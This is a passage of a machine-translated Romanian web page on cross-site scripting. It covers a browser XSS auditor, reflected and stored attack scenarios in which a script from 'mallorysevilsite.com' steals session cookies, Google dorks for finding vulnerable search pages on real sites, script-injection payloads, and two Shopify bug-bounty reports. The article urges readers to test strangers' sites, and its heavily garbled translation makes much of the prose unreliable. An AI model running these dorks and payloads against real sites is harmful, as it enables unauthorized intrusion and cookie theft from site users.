href="https://ilyarm.ru/ro/gde-nahodyatsya-sohranennye-paroli-v-gugl-hrom-mesto-hraneniya.html">Google Chrome.</a> (precum și în Opera, care utilizează acum motorul Google Chrome), așteptam o astfel de surpriză:</p> <blockquote> <p>dOM_XSS.HTML: 30 Auditorul XSS a refuzat să execute un script în "http: //localhost/tests/xss/dom_xss.html#input\u003dToken \u003cscript\u003e Alertă (1)</script>;</p> </blockquote> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/x09-2.jpg.pagespeed.ic.gM4b2zjNrR.jpg' width="100%" loading=lazy loading=lazy></p> <p>Acestea. Acum, în browser există un auditor XSS care va încerca să împiedice XSS. Nu există o astfel de funcționalitate în Firefox, dar cred că este o chestiune de timp. Dacă implementarea în browsere va avea succes, atunci putem vorbi despre o dificultate semnificativă de utilizare a XSS.</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x10-3.jpg.pagespeed.ic.YAGfPEUxeH.jpg' width="100%" loading=lazy loading=lazy></p> <p>Este util să ne amintim că browserele moderne iau măsuri pentru a limita nivelul de funcționare a problemelor, cum ar fi XSS non-permanent și bazate pe Dom XSS. Includerea este necesară amintiți-vă la testarea site-urilor web utilizând un browser - este posibil să fie că aplicația web este vulnerabilă, dar nu vedeți o confirmare pop-up din motivul pentru care browserul îl blochează.</p> <h2>Exemple de exploatare XSS. <br></h2> <p>Malefacatori, care intenționează să utilizeze vulnerabilități de scripting intersiteite, ar trebui să abordeze fiecare clasă de vulnerabilități în moduri diferite. Aici sunt descrise vectorii de atacuri pentru fiecare clasă.</p> <p>Cu vulnerabilități XSS, carnea de vită poate fi utilizată în atacuri, care extinde atacul de pe site-ul web la mediul local al utilizatorilor.</p> <p><b>Exemplu de atac cu xss non-permanent</b></p> <p>1. Alice vizitează adesea un site specific care găzduiește Bob. Site-ul Bob permite lui Alice să se conecteze cu numele utilizatorului / parolei și să salveze date sensibile, cum ar fi informațiile de plată. Când utilizatorul exercită introducerea, browserul păstrează cookie-urile de autorizare care arată ca caractere fără sens, adică. Ambele computere (client și server) amintesc că a intrat.</p> <p>2. Maloarele notează că site-ul Bob conține vulnerabilitate non-permanentă XSS:</p> <p>2.1 Când vizitați pagina de căutare, introduceți o linie pentru a căuta și faceți clic pe butonul Trimitere Dacă rezultatele nu sunt găsite, pagina afișează șirul de căutare introdus, urmat de cuvintele "nu găsite" și adresa URL <b>http://bobssite.org?q\u003de prin interogarea de căutare</b></p> <p>2.2 Cu o interogare de căutare normală ca cuvântul " <b>căţeluş</b>»Pagina pur și simplu afișează" <b>căţeluş</b> Nu a fost găsit "și url http://bobssite.org?q\u003d <b>căţeluş</b>Ceea ce este un comportament destul de normal.</p> <p>2.3 Cu toate acestea, atunci când o interogare de căutare anormală este trimisă la căutare <b><script type="text/javascript">alert("xss");</script> </b>:</p> <p>2.3.1 Apare un mesaj de avertizare (care spune "XSS").</p> <p>2.3.2 Afișează pagina <b><script type="text/javascript">alert("xss");</script> nu a fost gasit</b> Împreună cu un mesaj de eroare cu textul "XSS".</p> <p>2.3.3 URL Potrivit pentru funcționare <b>http://bobssite.org?q\u003d.<script%20type="text/javascript">alert("xss");</script> </b></p> <p>3. Maloare desenează adresa URL pentru a opera vulnerabilitatea:</p> <p>3.1 Ea face adresa URL <b>http://bobssite.org?q\u003dpuppies.<script%20src="http://mallorysevilsite.com/authstealer.js"></script> </b>. Poate alege să convertească caracterele ASCII într-un format hexazecimal, cum ar fi <b>http://bobssite.org?q\u003dpuppies%3CScript%2520SRC%3D%22HTTP%3A%2F%2FmallorysevilSite.com%2FAUTHSTEALER.JS%22%3e.</b> Pentru ca oamenii să poată descifra imediat o adresă URL rău intenționată.</p> <p>3.2 Ea trimite un e-mail unui membru nesuspect al site-ului Bob, spunând: "Verificați câinii răciți".</p> <p>4. Alice primește o scrisoare. Ea iubește câinii și faceți clic pe link. Ea merge la site-ul Bob în căutare, ea nu găsește nimic, acolo afișează "câinii care nu au fost găsiți", iar în mijlocul etichetei, eticheta este pornită cu un script (este invizibil pe ecran), Încărcături și execută programul Malory Authstealer.js (XSS Attack). Alice uită despre asta.</p> <p>5. Programul AuthTTEALER.JS începe în browserul Alice ca și cum sursa sa este site-ul Bob. Ea captează o copie a cookie-urilor de autorizare Alice și trimite la serverul malory, unde maloarele le elimină.</p> <p>7. Acum, că maloarele din interior, se duce la site-ul web al site-ului, arată și fura o copie a numărului cardului de credit Alice. Apoi merge și schimbă parola, adică Acum, Alice nu poate merge nici măcar.</p> <p>8. Ea decide să facă <a href="https://ilyarm.ru/ro/konvertirovat-fail-fb2-preobrazovanie-faila-fb2-v-dokument-microsoft-word-sleduite.html">urmatorul pas</a> Și trimite Bob-ul propus în mod similar cu link-ul, și astfel primește privilegii administrative ale site-ului Bob.</p> <p><b>Atac cu XSS constant</b></p> <ol><li>Malorii au un cont pe site-ul Bob.</li> <li>Malory observă că site-ul Bob conține o vulnerabilitate constantă XSS. Dacă mergeți la o nouă secțiune, plasați un comentariu, apoi afișează că nu va fi imprimată în ea. Dar dacă textul de comentariu conține etichete HTML, aceste etichete vor fi afișate așa cum este, iar orice etichete de scripting sunt lansate.</li> <li>Malory citește un articol în secțiunea de știri și scrie un comentariu în secțiunea de comentarii. În comentariu, introduce textul:</li> <li>În această poveste mi-a plăcut atât de mult câinii. Sunt atât de drăguți! <script src="http://mallorysevilsite.com/authstealer.js"></li> <li>Când Alice (sau oricine altcineva) Descărcați pagina cu acest comentariu, eticheta de script malory este lansată și furați bucătarii de autorizație din Alice, trimite Malory la serverul secret pentru a colecta.</li> <li>Malorii pot intercepta acum sesiunea Alice si pot da pentru Alice.</li> </ol><h2>Căutați site-uri vulnerabile la XSS <br></h2> <p><b>Dorki pentru XSS.</b></p> <p>Primul pas este alegerea site-urilor pe care vom efectua atacuri XSS. Site-urile pot fi semnate folosind Google Dorkov. Iată câteva dintre aceste distanțe care copiază și lipiți în căutarea Google:</p> <ul><li>inurl: căutare.php? q \u003d</li> <li>inurl: .php? Q \u003d</li> <li>inurl: Search.php.</li> <li>inurl: .php? Căutare \u003d</li> </ul><p>Înainte de a deschide o listă de site-uri. Trebuie să deschideți site-ul și să găsiți câmpuri de introducere pe acesta, cum ar fi formularul de feedback, formularul de intrare, căutarea site-ului etc.</p> <p>Am observat imediat că este aproape inutil să căutăm vulnerabilități în aplicații web actualizate automat actualizate. Exemplul clasic al unei astfel de aplicații este WordPress. De fapt, vulnerabilitățile din WordPress și mai ales în pluginurile sale, există. Mai mult, există numeroase site-uri care nu actualizează nici motorul WordPress (datorită faptului că Webmaster a făcut unele modificări ale codului sursă), nici pluginuri și subiecte (de regulă, acestea sunt pluginuri și subiecte piratate). Dar dacă citiți această secțiune și recunoașteți ceva nou de la ea, atunci WordPress nu este încă pentru dvs. ... Voi reveni cu siguranță la ea mai târziu.</p> <p>Cele mai bune obiective sunt o varietate de motoare și scripturi auto-scrise.</p> <p>Puteți alege ca o sarcină utilă pentru inserare</p><p> <script>alert(1)</script> </p><p>Fiți atenți la care codurile codului HTML Falls codul dvs. încorporat. Iată un exemplu de câmp tipic de introducere a câmpului ( <b>intrare</b>):</p><p> <input type="text" class="ui-input query" name="q" value="fata de perna"/><script>alert(1)</script><input value="" /> </p><p>Încărsta noastră utilă va merge acolo unde este cuvântul "pernă" este acum. Acestea. Întoarceți-vă la etichetă <b>intrare</b>. Putem evita acest lucru - închideți un citat dublu și apoi eticheta însăși <b>"/> </b></p> <p> "/><script>alert(1)</script> </p><p>Să încercăm-o pentru câteva site-uri:</p> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/101.jpg' width="100%" loading=lazy loading=lazy></p> <p>Vulnerabilitate excelentă</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/102.jpg' width="100%" loading=lazy loading=lazy></p> <h2>Programe pentru căutare și scanare XSS Vulnerabilitate <br></h2> <p>Probabil că toate scanerele de aplicații web au un scanner de vulnerabilitate XSS încorporat. Acest subiect este awkhanging, este mai bine să vă familiarizați cu fiecare astfel de scaner separat.</p> <p>Scripting-ul transfrontalier sau scripting-ul de site-uri sau XSS, presupune prezența unui site care conectează un cod JavaScript neprevăzut, care, la rândul său, este transmis utilizatorilor care efectuează acest cod în browserele lor. Exemplul inofensiv al XSS (la fel ca acesta trebuie să utilizați!) Arată așa:</p> <p>alertă ("xss");</p> <p>Acest lucru va crea apel <a href="https://ilyarm.ru/ro/peremennye-oblast-vidimosti-peremennyh-funkcii-v-javascript--.html">funcția JavaScript</a> Alertă și creați o fereastră simplă (și inofensivă) cu litere XSS. ÎN <a href="https://ilyarm.ru/ro/how-to-roll-back-android-to-the-previous-version-how-to-roll-back-an-android-update.html">versiunile anterioare</a> Cărți Vă recomandăm să utilizați acest exemplu atunci când scrieți rapoarte. A fost astfel încât un hacker extrem de reușit mi-a spus că a fost un "exemplu teribil", explicând că beneficiarul raportului de vulnerabilitate nu poate înțelege pericolul problemei și datorită inofensivului de exemplu, să plătească o mică remunerație.</p> <p>Astfel, utilizați acest exemplu pentru a detecta vulnerabilitatea XSS, dar atunci când elaborează un raport, ia în considerare răul potențial care poate provoca vulnerabilitate și explica acest lucru. Sub acest lucru, nu vreau să spun povestea companiei despre ceea ce este XSS, dar propun să explic ceea ce puteți realiza, folosind o vulnerabilitate și cât de specific ar putea afecta site-ul lor.</p> <p>Există trei tipuri diferite de XSS, pe care le puteți auzi atunci când cercetați și scrieți rapoarte:</p> <ul><li>Reflective XSS: Aceste atacuri nu sunt salvate pe site, ceea ce înseamnă crearea și executarea XSS într-o singură cerere și răspuns.</li> <li>XSS stocate: aceste atacuri sunt salvate pe site și sunt adesea mai periculoase. Acestea sunt salvate pe server și sunt efectuate pe pagini "normale" de către utilizatorii care nu se întreabă.</li> <li>Auto XSS: Aceste atacuri nu sunt, de asemenea, salvate pe site și sunt de obicei folosite ca parte a înșelăciunii unei persoane pentru a rula singuri XSS. Când căutați vulnerabilități, veți găsi că companiile nu le pasă de eliminarea auto-XSS, Ei sunt îngrijorați de acele cazuri în care vătămarea utilizatorilor lor nu pot fi aplicate de ele însele, ci oricine altcineva, ca în cazul XSS reflectorizant și stocat. Cu toate acestea, acest lucru nu înseamnă că nu ar trebui să căutați auto XSS.</li> </ul><p>Dacă ați găsit o situație în care auto XSS poate fi executată, dar nu este salvată, gândiți-vă cum poate fi folosită această vulnerabilitate, puteți să o utilizați în combinație cu ceva, astfel încât să nu mai fie auto-XSS?</p> <p>Unul dintre cele mai renumite exemple de utilizare a lucrării XSS - Myspace Samy, efectuată de Camcar. În octombrie 2005, vulnerabilitatea XSS stocată pe MySpace, care la permis să descarce codul JavaScript, care a fost efectuat de fiecare dată când cineva a vizitat pagina sa MySpace prin adăugarea unei vizite la profilul profilului înșiși. Mai mult, codul sa copiat, de asemenea, pe paginile de noi prieteni înșiși, astfel încât profilurile noilor prieteni să fie actualizate cu următorul text: "Dar, mai ales, Samy este eroul meu".</p> <p>Deși exemplul în sine a fost relativ inofensiv, utilizarea XSS vă permite să furați login, parole, informații bancare și așa mai departe. În ciuda efectului potențial, corectarea vulnerabilităților XSS nu este de obicei dificilă și necesită dezvoltatorilor să protejeze pur și simplu intrarea utilizatorului (direct ca în injecțiile HTML) când este afișată. Deși unele site-uri elimină, de asemenea, caracterele potențial rău intenționate atunci când hacker-ul le trimite.</p> <h3>1. Vanzare Schimba</h3> <p><b>Complexitate:</b> Scăzut <br><b>URL:</b> En-gros.shopify.com. <br><b>Legătura cu raportul:</b> https://hackerone.com/reports/10629326 Raport Data: 21 decembrie 2015 <br><b>Payroll:</b> $500<br><b>Descriere:</b></p> <p>Vânzarea site-ului ShopiFify27 este o pagină simplă cu un apel direct la acțiune - introduceți numele bunurilor și faceți clic pe "Găsiți produse". Iată o captură de ecran:</p> <p><img src='https://i2.wp.com/cryptoworld.su/wp-content/uploads/2016/11/5ddb8743022bec718aae541fc75d3ebd.png' width="100%" loading=lazy loading=lazy></p><p>Site screenshot Vanzare Totalesale</p> <p>Vulnerabilitatea XSS a fost cea mai simplă, care se poate găsi numai - textul introdus în șirul de căutare nu a fost protejat, astfel încât să intre în JavaScript. Iată textul trimis din descrierea vulnerabilității: test ", alertă (" xss ");</p> <p>Motivul pentru care a funcționat este că Shopify a luat intrarea utilizatorului, a efectuat o interogare de căutare și în absența rezultatelor, tipărirea unui mesaj de raportare a absenței rezultatelor căutării pentru interogarea introdusă, indicând pagina care nu este protejată de utilizator nu a fost protejată. Ca rezultat, JavaScript expediat trimis pe pagină și browsere a interpretat-o \u200b\u200bca JavaScript executabil.</p> <h3>Concluzii</h3> <p>Testați totul, acordați o atenție deosebită situațiilor în care textul introdus se referă pe pagină. Verificați dacă puteți activa în introducerea HTML sau JavaScript și vedeți cum le procesează site-ul. În mod similar, încercați să codificați înregistrarea, cum ar fi descrisă în capitolul dedicat injecțiilor HTML.</p> <p>Vulnerabilitățile XSS nu ar trebui să fie complexe sau confuze. Această vulnerabilitate a fost cea mai simplă, care se poate imagina este un câmp simplu pentru introducerea textului care nu procesează intrarea utilizatorului. Și a fost descoperită la 21 decembrie 2015 și a adus hacker de 500 de dolari! Tot ce avea nevoie - gândirea hackerului.</p> <h3>2. Shopify Card de cadou cadou</h3> <p><b>Complexitate:</b> Scăzut <br><b>URL:</b> hardware.shopify.com/cart. <br><b>Legătura cu raportul:</b> https://hackerone.com/reports/9508928 Raport Data: 21 octombrie 2015 <br><b>Payroll:</b> $500<br><b>Descriere:</b></p> <p>Magazin de site <a href="https://ilyarm.ru/ro/sozdanie-akkaunta-v-app-store-kak-sozdat-apple-id-bez-kreditnoi-karty.html">carduri cadou</a> Shopify29 permite utilizatorilor să-și creeze propriul design pentru carduri cadou utilizând o formă HTML, care include fereastra de încărcare a fișierelor, mai multe rânduri pentru a intra în textul detaliilor și așa mai departe. Iată o captură de ecran:</p> <p><img src='https://i1.wp.com/cryptoworld.su/wp-content/uploads/2016/11/9918de0af2718d46ad92c4b916ae68ac.png' width="100%" loading=lazy loading=lazy></p><p>Schify Gift Card Store Form Screenshot</p> <p>Vulnerabilitatea XSS a fost declanșată aici când a fost în câmpul formularului, care a fost destinată numelui imaginii, a fost introdusă JavaScript. Este destul de ușor de făcut, folosind proxy HTML, despre care vom vorbi cu capitolul de latență "Instrumente". Deci, segmentul original al formularului a inclus:</p> <table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td> <td class="crayon-code"><p>Conținut - dispoziție: formular - date; Name \u003d "Proprietăți [ArtWor 2 K File]"</p> </td> </tr></table><br> Ar putea fi interceptată și schimbată pe: <br><table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td> <td class="crayon-code"><p>Conținut - dispoziție: formular - date; Name \u003d "Proprietăți [ArtWor 2 K Fișier< img src = ’test ’onmouseover = ’alert (2 ) ’> ] ”; </p> </td> </tr></table> <h3>Concluzii</h3> <p>Aici puteți observa două lucruri care vor ajuta la detectarea vulnerabilităților XSS.</p> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </article></section><div id="yandex_rtb_R-A-242532-1"></div> <div class="decom_dop_bloc"><a name="comments"></a></div></main> <aside class="sidebar"> <div class="top"> <p> <script id="custom-block-92677863" type="text/javascript"> custom_block(17, 92677863, 5896); </script> </p> <div class="top__headline"><span>Top 5 cele mai bune articole</span></div> <div class="tabs"> <div class="top-item"> <div class="top-item__image"><img src="/uploads/f0db9f719c4843c0789153c8cde9f180.jpg" width="88" height="58" alt="Tarif Smart Business M MTS" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ro/obzor-tarifa-umnyi-biznes-start-na-mts-tarif-umnyi-biznes-m-mts-kak.html">Tarif Smart Business M MTS</a></div> <p>Taxa lunară pentru prima lună este scrisă în ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/85a6cd5a1681a95ec993b5953d7daeb4.jpg" width="88" height="58" alt="Echipamente pentru televiziune digitală - aceasta este ceea ce puteți cumpăra în magazinul nostru" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ro/cifrovoi-tyuner-mts-oborudovanie-dlya-cifrovogo-televideniya--.html">Echipamente pentru televiziune digitală - aceasta este ceea ce puteți cumpăra în magazinul nostru</a></div> <p> Operatorul oferă clienților săi mari ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/8768391b7bd1c4256c00433373ae222b.jpg" width="88" height="58" alt="MTS "SMART pentru propria lor" - descrierea tarifului pentru angajații MTS și cum să obțineți codul de activare?" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ro/super-mts-dlya-svoih-kupit-kod-mts-smart-dlya-svoih-opisanie-tarifa-dlya.html">MTS "SMART pentru propria lor" - descrierea tarifului pentru angajații MTS și cum să obțineți codul de activare?</a></div> <p> Operatorii celulari au tarife non-publice, ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/a5b19970e6136d864e3fdce9f2ac0e34.jpg" width="88" height="58" alt="Programare NFC Etichete pe telefonul dvs. cu Windows Phone (Instruire) Cum să plătiți pentru NFC Călătorii la Lumium 720" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ro/chto-eto-nfc-i-kak-im-polzovatsya-programmirovanie-nfc-metok-na-telefone-s-windows-phone.html">Programare NFC Etichete pe telefonul dvs. cu Windows Phone (Instruire) Cum să plătiți pentru NFC Călătorii la Lumium 720</a></div> <p>Comunicarea câmpului apropiat, mai faimos ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/fa9db78913c4184ac827b492d53d189c.jpg" width="88" height="58" alt="Cabane în Finlanda Cele mai bune motoare de căutare Cabane în Finlanda" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ro/bronirovanie-kottedzhei-v-finlyandii-v-rezhime-onlain-udobno-i.html">Cabane în Finlanda Cele mai bune motoare de căutare Cabane în Finlanda</a></div> <p>Închiriați o cabană în Finlanda - un serviciu profitabil ... ...</p> </div> </div> <div id="mywidget-recommendations-3"> </div> </div> <div class="top"> <p> <script id="custom-block-92677863" type="text/javascript"> custom_block(17, 92677863, 5896); </script> </p> <div class="top__headline"><span>Articole noi</span></div> <div class="tabs"> <div class="top-item"> <div class="top-item__image"><img src="/uploads/60d2a905c416a8a56661b33b42f56eae.jpg" width="88" height="58" alt="Cabane de rezervă în Finlanda Online: Închirieri convenabile și profitabile Casa Finlanda" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ro/nedorogie-kottedzhi-v-finlyandii-bronirovanie-kottedzhei-v-finlyandii-v-rezhime.html">Cabane de rezervă în Finlanda Online: Închirieri convenabile și profitabile Casa Finlanda</a></div> <p>Prezentăm propunerile lor în Rusia ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/b94896472fd6bff36daf430748c3a1f1.jpg" width="88" height="58" alt="Această direcție este temporar inaccesibilă pentru tele2" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ro/mts-sistema-vremenno-nedostupna-chto-delat-dannoe-napravlenie-vremenno.html">Această direcție este temporar inaccesibilă pentru tele2</a></div> <p> Articole și Lifechaknogy doresc să știe când ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/2022fa810a1414ced819c7de76add54e.jpg" width="88" height="58" alt="Principiul muncii virtuale PBX" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ro/vozmozhnosti-virtualnoi-ats-princip-raboty-virtualnoi-ats.html">Principiul muncii virtuale PBX</a></div> <p>Principiul muncii PBX virtual Putem ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/dc2781588c6603867f75d3ba8b4eb561.jpg" width="88" height="58" alt="Ce este o rețea corporativă" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ro/chto-takoe-korporativnaya-set-korporativnye-seti-naznachenie.html">Ce este o rețea corporativă</a></div> <p>Crearea unei rețele locale este cea mai bună cale ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/bf4fa99bce53ba4635e8385e0e7c9a26.jpg" width="88" height="58" alt="Ce trebuie să faceți pentru a debloca?" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ro/mts-nomer-zablokirovan-chto-delat-dlya-razblokirovki-abonement.html">Ce trebuie să faceți pentru a debloca?</a></div> <p>Care ar putea fi cauza situației atunci când serviciul ... ...</p> </div> </div> <div id="mywidget-recommendations-3"> </div> </div> </aside> </div> <footer class="footer"><div class="footer__copyright"> <a href='https://play.google.com/store/apps/details?id=org.planetsapp.pdfreader' target='_blank' onclick="navigator.sendBeacon('https://live.electrikhelp.com/iibim?q=gplay&sub1=ilyarm.ru&sub2=org.planetsapp.pdfreader&u='+encodeURIComponent(window.location.href)+'&refjs='+encodeURIComponent(document.referrer)+'');"><img src='/googleplay.svg' style='opacity:0.4; height: 20px; margin:10px; '></a> <p>© 2021 IlyArm.ru.</p> <div class="footer__sogl"> </div> </div><div class="footer__counters" id="text-2"><div class="textwidget"> </div></div><span style="display: none;"></span></footer> </div></div><script type='text/javascript' src='https://ilyarm.ru/wp-content/plugins/decomments/templates/decomments/assets/js/decom.min.js?ver=1499187887'></script><script type='text/javascript' src='https://ilyarm.ru/wp-content/plugins/wp-postratings/js/postratings-js.js?ver=1.85'></script><script type='text/javascript'>var q2w3_sidebar_options = new Array(); q2w3_sidebar_options[0] = { "sidebar" : "sidebar-2", "margin_top" : 20, "margin_bottom" : 260, "stop_id" : "", "screen_max_width" : 0, "screen_max_height" : 0, "width_inherit" : false, "refresh_interval" : 1500, "window_load_hook" : false, "disable_mo_api" : false, "widgets" : ['mywidget-recommendations-3'] } ; </script><script type='text/javascript' src='https://ilyarm.ru/wp-content/plugins/q2w3-fixed-widget/js/q2w3-fixed-widget.min.js?ver=5.0.4'></script><script type='text/javascript' src='https://ilyarm.ru/wp-content/themes/mobi/js/scripts.js'></script><script type='text/javascript' src='/wp-includes/js/comment-reply.min.js?ver=4.9.1'></script><script type='text/javascript'>/* <![CDATA[ */ var thickboxL10n = { "next":"\u0414\u0430\u043b\u0435\u0435 \u2192","prev":"\u2190 \u041d\u0430\u0437\u0430\u0434","image":"\u0418\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u0435","of":"\u0438\u0437","close":"\u0417\u0430\u043a\u0440\u044b\u0442\u044c","noiframes":"\u042d\u0442\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 \u043f\u043b\u0430\u0432\u0430\u044e\u0449\u0438\u0445 \u0444\u0440\u0435\u0439\u043c\u043e\u0432. \u0423 \u0432\u0430\u0441 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u044b \u0442\u0435\u0433\u0438 iframe, \u043b\u0438\u0431\u043e \u0432\u0430\u0448 \u0431\u0440\u0430\u0443\u0437\u0435\u0440 \u0438\u0445 \u043d\u0435 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442.","loadingAnimation":"https:\/\/ilyarm.ru\/wp-includes\/js\/thickbox\/loadingAnimation.gif"} ; /* ]]> */ </script><script type='text/javascript' src='/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105'></script><script data-cfasync='false'>/*! loadCSS. [c]2017 Filament Group, Inc. MIT License */ !function(a){ "use strict";var b=function(b,c,d){ function e(a){ return h.body?a():void setTimeout(function(){ e(a)} )} function f(){ i.addEventListener&&i.removeEventListener("load",f),i.media=d||"all"} var g,h=a.document,i=h.createElement("link");if(c)g=c;else{ var j=(h.body||h.getElementsByTagName("head")[0]).childNodes;g=j[j.length-1]} var k=h.styleSheets;i.rel="stylesheet",i.href=b,i.media="only x",e(function(){ g.parentNode.insertBefore(i,c?g:g.nextSibling)} );var l=function(a){ for(var b=i.href,c=k.length;c--;)if(k[c].href===b)return a();setTimeout(function(){ l(a)} )} ;return i.addEventListener&&i.addEventListener("load",f),i.onloadcssdefined=l,l(f),i} ;"undefined"!=typeof exports?exports.loadCSS=b:a.loadCSS=b} ("undefined"!=typeof global?global:this); /*! loadCSS rel=preload polyfill. [c]2017 Filament Group, Inc. MIT License */ !function(a){ if(a.loadCSS){ var b=loadCSS.relpreload={ };if(b.support=function(){ try{ return a.document.createElement("link").relList.supports("preload")} catch(b){ return!1} },b.poly=function(){ for(var b=a.document.getElementsByTagName("link"),c=0;c<b.length;c++){ var d=b[c];"preload"===d.rel&&"style"===d.getAttribute("as")&&(a.loadCSS(d.href,d,d.getAttribute("media")),d.rel=null)} },!b.support()){ b.poly();var c=a.setInterval(b.poly,300);a.addEventListener&&a.addEventListener("load",function(){ b.poly(),a.clearInterval(c)} ),a.attachEvent&&a.attachEvent("onload",function(){ a.clearInterval(c)} )} }} (this);</script></body></html>